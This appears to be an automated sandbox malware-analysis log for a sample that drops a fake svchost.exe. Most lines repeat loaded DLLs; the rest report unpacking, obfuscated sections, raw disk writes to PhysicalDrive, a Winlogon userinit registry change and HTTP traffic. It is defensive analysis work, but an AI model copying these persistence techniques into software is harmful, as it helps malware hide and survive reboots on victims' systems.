Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
Section loaded: ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, urlmon.dll, srvcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: srvcli.dll
Source: C:\Users\user\Desktop\WlCVLbzNph.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32
Source: WlCVLbzNph.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.2700878019.0000000007C3B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.2697326955.0000000003EE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000003.2667325772.000000000CC44000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000003.2667325772.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562718584.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb( source: svchost.exe, 00000002.00000003.2667325772.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562718584.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nPtwtzGyOdAtB.exe, 00000005.00000002.1934683866.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000006.00000002.1935101220.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000000A.00000000.1817445370.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000000D.00000002.1935586278.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000000F.00000000.1852775945.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1881079746.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000016.00000000.1879737054.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000019.00000000.1898777983.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000001C.00000002.1914742299.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000001E.00000002.2019539381.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000020.00000002.2050100961.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000023.00000002.2052551913.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989138523.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000003.2567509191.000000000CC1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC1E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000002.2693529547.000000000324A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000002.2693529547.000000000324A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.2708926812.000000000CD8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000003.2667325772.000000000CC44000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.2697326955.0000000003EE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.2708926812.000000000CD8E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\WlCVLbzNph.exeUnpacked PE file: 0.2.WlCVLbzNph.exe.400000.1.unpack .text:ER;.j:R;.nkytZ:R;.N:R;.fc:W;.data:W;.s:W;.w:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack .text:ER;.j:R;.nkytZ:R;.N:R;.fc:W;.data:W;.s:W;.w:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 5.2.nPtwtzGyOdAtB.exe.1410000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 6.2.nPtwtzGyOdAtB.exe.1380000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 10.2.nPtwtzGyOdAtB.exe.3210000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 13.2.nPtwtzGyOdAtB.exe.3160000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 20.2.nPtwtzGyOdAtB.exe.1400000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 32.2.nPtwtzGyOdAtB.exe.2840000.2.unpack
Source: C:\Users\user\Desktop\WlCVLbzNph.exeUnpacked PE file: 0.2.WlCVLbzNph.exe.400000.1.unpack
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00401FC0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_00401FC0
Source: WlCVLbzNph.exeStatic PE information: real checksum: 0x51906146 should be: 0x40f06
Source: svchost.exe.0.drStatic PE information: real checksum: 0x310a7fed should be: 0x40f06
Source: WlCVLbzNph.exeStatic PE information: section name: .j
Source: WlCVLbzNph.exeStatic PE information: section name: .nkytZ
Source: WlCVLbzNph.exeStatic PE information: section name: .N
Source: WlCVLbzNph.exeStatic PE information: section name: .fc
Source: WlCVLbzNph.exeStatic PE information: section name: .s
Source: WlCVLbzNph.exeStatic PE information: section name: .w
Source: svchost.exe.0.drStatic PE information: section name: .j
Source: svchost.exe.0.drStatic PE information: section name: .nkytZ
Source: svchost.exe.0.drStatic PE information: section name: .N
Source: svchost.exe.0.drStatic PE information: section name: .fc
Source: svchost.exe.0.drStatic PE information: section name: .s
Source: svchost.exe.0.drStatic PE information: section name: .w
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004000C2 push esp; ret 0_2_004000C3
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0040008D push FB0DB0C3h; ret 0_2_004000B7
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0044C903 push cs; ret 0_2_0044C918
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0044C939 push cs; iretd 0_2_0044C948
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0044C26D push es; iretd 0_2_0044C27C
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00448CA0 push eax; ret 0_2_00448CCE
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0210065B push ebx; ret 0_2_02100677
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0210065B push dword ptr [esp+48h]; ret 0_2_02100747
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_02100678 push dword ptr [esp+48h]; ret 0_2_02100747
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004000C2 push esp; ret 2_2_004000C3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040008D push FB0DB0C3h; ret 2_2_004000B7
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044C903 push cs; ret 2_2_0044C918
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044C939 push cs; iretd 2_2_0044C948
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044C26D push es; iretd 2_2_0044C27C
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00448CA0 push eax; ret 2_2_00448CCE
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB6B03 push cs; ret 2_2_02CB6B18
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CACB03 push esi; retf 2_2_02CACB04
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB6B39 push cs; iretd 2_2_02CB6B48
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB28A0 push eax; ret 2_2_02CB28CE
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAE990 push esi; retf 2_2_02CAE994
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CACEB1 push esi; retf 2_2_02CACEB5
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAE62D push esi; retf 2_2_02CAE631
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB646D push es; iretd 2_2_02CB647C
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E726D push es; iretd 2_2_029E727C
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D4392 push ebp; retf 2_2_029D4393
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D410C push ebp; retf 2_2_029D410D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E3CA0 push eax; ret 2_2_029E3CCE
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02B20678 push dword ptr [esp+48h]; ret 2_2_02B20747
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02B2065B push ebx; ret 2_2_02B20677
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02B2065B push dword ptr [esp+48h]; ret 2_2_02B20747
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014528A0 push eax; ret 5_2_014528CE

Persistence and Installation Behavior

Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_02C82030
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_01422030
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_01392030
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u10_2_03222030
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile created: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\WlCVLbzNph.exeExecutable created and started: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\0_2_00403440

Boot Survival

Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_02C82030
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_01422030
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_01392030
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u10_2_03222030
Source: C:\Windows\apppatch\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinit
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

Source: c:\users\user\desktop\wlcvlbznph.exeFile moved: C:\Users\user\AppData\Local\Temp\5AFF.tmp
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 8000
